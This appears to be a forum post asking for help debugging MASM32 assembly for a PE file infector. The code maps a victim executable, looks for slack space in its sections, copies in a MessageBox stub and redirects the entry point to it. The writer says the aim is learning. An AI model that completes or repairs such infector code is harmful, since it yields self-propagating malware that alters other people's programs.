
add new code at the end of a section

First I want to say one important thing. I don't want to write a powerful virus. I want to understand how they work and how antivirus programs work.

I want to add code at the end of a section. I wrote the file which I want to modify.
Here is the code of the victim file:
[code]
.data
; Victim program for the experiment (MASM32, stdcall): shows one message box and exits.
; Presumably the string is the observable marker — if the box still shows this
; text, the file has not been modified.
DB_strOutput DB "Dosen't infected",0
.code
_start:
; MessageBox(NULL, text, caption, MB_OK) — the same string is used for text and caption
invoke MessageBox, 0, offset DB_strOutput, offset DB_strOutput, MB_OK
; ExitProcess(0) — argument pushed explicitly instead of via invoke
push 0
call ExitProcess
end _start[/code]

I wrote code to modify the victim file:
[code].586p
.model flat,stdcall
option casemap:none

include masm32includewindows.inc
include masm32includeuser32.inc
includelib masm32libuser32.lib

include masm32includekernel32.inc
includelib masm32libkernel32.lib


.data

DB_strAddress DB "C:/firstMalware_victim.exe",0
DD_hFile_Mapping DD ?
DD_adressOfMappingFile DD ?
DD_hFile DD ?
DW_numberOfSections DW ?;????? ??????
DD_addressOfIMAGE_DOS_HEADER DD ?
DD_addressOfIMAGE_FILE_HEADER DD ?
DD_addressOfIMAGE_OPTIONAL_HEADER DD ?
DD_addressOfIMAGE_NT_HEADERS DD ?
DD_addressOfDataDirectory DD ?
DD_addressOfIMAGE_SECTION_HEADER DD ?
DB_string_forInfect DB "LOL",0;?????? ?????? 4 ?????
DD_sizeOfCode DD 0;size of code which we want to write in victim file
DD_addressToJump DD ?
DD_addressBeginOfNewCode DD ?;address where we implant new code
DD_addressOfNewString DD ?
.code
_start:

;open file
push 0
push FILE_ATTRIBUTE_NORMAL;The file does not have other attributes set. This attribute is valid only if used alone.
push OPEN_EXISTING
push 0
push FILE_SHARE_DELETE
push GENERIC_WRITE or GENERIC_READ
push offset DB_strAddress
call CreateFileA
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

cmp EAX, -1;ERROR?
jz EXIT

mov DD_hFile, EAX
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;call CreateFileMapping
push 0
push 0
push 0
push PAGE_READWRITE
push 0
push DD_hFile
call CreateFileMapping
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
mov DD_hFile_Mapping, EAX
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

;call MapViewOfFile
;Maps a view of a file mapping into the address space of a calling process.
push 0
push 0
push 0
push FILE_MAP_READ or FILE_MAP_WRITE
push DD_hFile_Mapping
call MapViewOfFile;Maps a view of a file mapping into the address space of a calling process.
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

mov DD_hFile_Mapping, EAX

cmp EAX, -1;ERROR?
jz EXIT


mov DD_adressOfMappingFile, EAX;load address of loaded file
mov EDI, DD_hFile_Mapping;set address of first byte of mapping-file
assume EDI:ptr IMAGE_DOS_HEADER;EDI points to IMAGE_DOS_HEADER
mov DD_addressOfIMAGE_DOS_HEADER, EDI

add EDI, [EDI].e_lfanew
mov DD_addressOfIMAGE_NT_HEADERS, EDI
assume EDI:ptr IMAGE_NT_HEADERS
lea EAX, [EDI].FileHeader
mov AX, [EDI].FileHeader.NumberOfSections
mov DW_numberOfSections, AX
mov EAX, DD_addressOfIMAGE_FILE_HEADER
lea EDI, [EDI].OptionalHeader
mov DD_addressOfIMAGE_OPTIONAL_HEADER, EDI
assume EDI:ptr IMAGE_OPTIONAL_HEADER
lea EAX, [EDI].DataDirectory
mov DD_addressOfDataDirectory, EAX
mov EAX, DD_addressOfIMAGE_NT_HEADERS
add EAX, sizeof IMAGE_NT_HEADERS
mov DD_addressOfIMAGE_SECTION_HEADER,EAX ;address of Sections Table
assume EAX:ptr IMAGE_SECTION_HEADER
;get to know size of our code which we want to implant
mov EBX, offset Label_forInfect_start
sub EBX, Label_forInfect_end
push EBX
add EBX,4;size of our code with a string
;check sections for a free size
xor ECX, ECX
.while CX < DW_numberOfSections
mov EDX, [EAX].Misc.VirtualSize
sub EDX, [EAX].SizeOfRawData;EBX contains free size in the section
.if EDX >= EBX
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;get to know whrere we should implant new code
mov ECX, [EAX].PointerToRawData
add ECX, [EAX].SizeOfRawData
mov DD_addressBeginOfNewCode, ECX
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
mov ECX, 4
mov ESI, offset DB_string_forInfect
mov DD_addressOfNewString, ESI
mov EDI, DD_addressBeginOfNewCode
cld
rep movsb;copy string to file
add DD_addressBeginOfNewCode, 4
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;copy code
;copy AddressOfEntryPoint
mov ECX, DD_addressOfIMAGE_OPTIONAL_HEADER
assume ECX:ptr IMAGE_OPTIONAL_HEADER
mov ESI, [ECX].AddressOfEntryPoint
mov DD_addressToJump, ESI;copy AddressOfEntryPoint
mov [ECX].AddressOfEntryPoint, offset Label_forInfect_start;change AddressOfEntryPoint
pop EBX
mov ECX, EBX;number of bytes which we should copy
mov ESI, Label_forInfect_start
mov EDI, DD_addressBeginOfNewCode
cld
rep movsb;copy code
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;

jmp LabelAfterWritingToTheSections
.endif
add EAX, sizeof IMAGE_SECTION_HEADER
inc CX
.endw
LabelAfterWritingToTheSections:

EXIT:
invoke ExitProcess,0

Label_forInfect_start:
invoke MessageBox,0, offset DB_string_forInfect, offset DB_string_forInfect, 1
push 0
push offset DB_string_forInfect
push offset DB_string_forInfect
push 1
call MessageBox
jmp DD_addressToJump
Label_forInfect_end:
end _start[/code]

I want to add this code at the beginning of the victim's file:
[code]Label_forInfect_start:
invoke MessageBox,0, offset DB_string_forInfect, offset DB_string_forInfect, 1
push 0
push offset DB_string_forInfect
push offset DB_string_forInfect
push 1
call MessageBox
jmp DD_addressToJump
Label_forInfect_end:[/code]

But I've got one problem. My program doesn't work.
I opened it in the debugger and found some strange things:
1. There are only 3 sections in the victim's file
2. This condition doesn't execute:
[code].if EDX >= EBX[/code]
Maybe I wrote something wrong before this.
I assume that I worked incorrectly with the fields from IMAGE_SECTION_HEADER.
[code]mov EDX, [EAX].Misc.VirtualSize
sub EDX, [EAX].SizeOfRawData;EBX contains free size in the section[/code]
I saw in the debugger that EDX contains a negative value:
FFFFFF92
And the last question: have I done something wrong here?
[code];get to know whrere we should implant new code
mov ECX, [EAX].PointerToRawData
add ECX, [EAX].SizeOfRawData
mov DD_addressBeginOfNewCode, ECX[/code]

